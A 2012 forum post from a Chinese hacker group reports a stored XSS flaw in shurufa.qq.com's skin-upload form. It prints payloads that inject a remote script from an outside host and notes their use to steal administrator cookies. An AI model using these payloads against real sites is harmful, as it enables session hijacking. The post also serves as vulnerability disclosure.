天马行空工作室

 找回密码
 加入天马
搜索
查看: 3336|回复: 1

shurufa.qq.com存储型xss

[复制链接]
发表于 2012-7-15 00:32:56 | 显示全部楼层 |阅读模式
这是七月以来的第一次检测。
测试代码很简单:”></textarea><embed/src=//tmxk.org><textarea>即可。可以是iframe或者script。
s1.JPG
如果,上图只能自己弹自己的话,皮肤提交则可以扩散。
发现提交皮肤上的form没做服务端过滤,文件格式判断依赖客户端,文件内容估计用md5查重,但没做性质判断,如文件头。
直接构造代码:
  1. document.getElemmentById("scpf_skin_name").value='<script/src=//2.gy/ehAM></script>';
  2. document.getElementById('skin_upload_form').submit();
复制代码
s2.JPG

s3.JPG
虽然这个需要审核,但危险性已不言而喻了。
审核意味着后台管理,可以把iframe变成1*1的框来写入代码,也可以用没有输出表征的script实现,管理的cookie不保,csrf同样大大的有啊。


评分

参与人数 2给力 +1 酱油 +5 收起 理由
Henry:bobo + 1 老大 加、加油 哈哈哈!~
X5T + 1 + 4 七月复出,老大继续给力 哈哈.

查看全部评分

发表于 2012-8-16 12:49:19 | 显示全部楼层
您需要登录后才可以回帖 登录 | 加入天马

本版积分规则

Archiver|手机版|小黑屋|天马行空工作室 ( 京ICP备12003429号  

GMT+8, 2018-11-16 22:38 , Processed in 0.345390 second(s), 27 queries .

Powered by Discuz! v8

© 2010-2014 shurufa.qq.com存储型xss - XSS 天马行空工作室

快速回复 返回顶部 返回列表